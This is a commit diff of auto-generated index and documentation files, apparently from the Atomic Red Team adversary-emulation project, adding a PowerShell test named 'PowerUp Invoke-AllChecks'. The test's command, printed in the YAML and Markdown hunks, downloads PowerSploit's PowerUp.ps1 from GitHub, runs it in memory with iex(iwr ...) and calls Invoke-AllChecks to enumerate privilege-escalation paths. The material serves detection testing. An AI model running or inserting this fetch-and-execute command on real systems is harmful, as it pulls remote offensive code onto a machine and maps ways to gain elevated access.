Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

atomics/Indexes/Indexes-CSV/index.csv

@@ -861,6 +861,7 @@ execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedComm
 execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
 execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
 execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
+execution,T1059.001,PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
 execution,T1059.006,Python,1,Execute shell script via python's command mode arguement,3a95cdb2-c6ea-4761-b24e-02b71889b8bb,sh
 execution,T1059.006,Python,2,Execute Python via scripts (Linux),6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8,sh
 execution,T1059.006,Python,3,Execute Python via Python executables (Linux),0b44d79b-570a-4b27-a31f-3bf2156e5eaa,sh

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -607,6 +607,7 @@ execution,T1059.001,PowerShell,17,ATHPowerShellCommandLineParameter -EncodedComm
 execution,T1059.001,PowerShell,18,ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments,0d181431-ddf3-4826-8055-2dbf63ae848b,powershell
 execution,T1059.001,PowerShell,19,PowerShell Command Execution,a538de64-1c74-46ed-aa60-b995ed302598,command_prompt
 execution,T1059.001,PowerShell,20,PowerShell Invoke Known Malicious Cmdlets,49eb9404-5e0f-4031-a179-b40f7be385e3,powershell
+execution,T1059.001,PowerShell,21,PowerUp Invoke-AllChecks,1289f78d-22d2-4590-ac76-166737e1811b,powershell
 execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86-4c2d-b66c-61945aee87c2,command_prompt
 execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt
 execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -1499,6 +1499,7 @@
   - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
   - Atomic Test #19: PowerShell Command Execution [windows]
   - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
+  - Atomic Test #21: PowerUp Invoke-AllChecks [windows]
 - [T1059.006 Python](../../T1059.006/T1059.006.md)
   - Atomic Test #1: Execute shell script via python's command mode arguement [linux]
   - Atomic Test #2: Execute Python via scripts (Linux) [linux]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -1075,6 +1075,7 @@
   - Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
   - Atomic Test #19: PowerShell Command Execution [windows]
   - Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
+  - Atomic Test #21: PowerUp Invoke-AllChecks [windows]
 - T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.005 Scheduled Task](../../T1053.005/T1053.005.md)
   - Atomic Test #1: Scheduled Task Startup Script [windows]

atomics/Indexes/index.yaml

@@ -62185,6 +62185,19 @@ execution:
               "function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
           foreach ($cmdlets in $malcmdlets) {
               $cmdlets}
+    - name: PowerUp Invoke-AllChecks
+      auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b
+      description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
+          Invoke-AllChecks
+        name: powershell
   T1059.006:
     technique:
       external_references:

atomics/T1059.001/T1059.001.md

@@ -50,6 +50,8 @@ PowerShell commands/scripts can also be executed without directly invoking the <
 
 - [Atomic Test #20 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-20---powershell-invoke-known-malicious-cmdlets)
 
+- [Atomic Test #21 - PowerUp Invoke-AllChecks](#atomic-test-21---powerup-invoke-allchecks)
+
 
 <br/>
 
@@ -842,4 +844,34 @@ foreach ($cmdlets in $malcmdlets) {
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #21 - PowerUp Invoke-AllChecks
+Check for privilege escalation paths using PowerUp from PowerShellMafia
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1289f78d-22d2-4590-ac76-166737e1811b
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
+Invoke-AllChecks
+```
+
+
+
+
+
+
 <br/>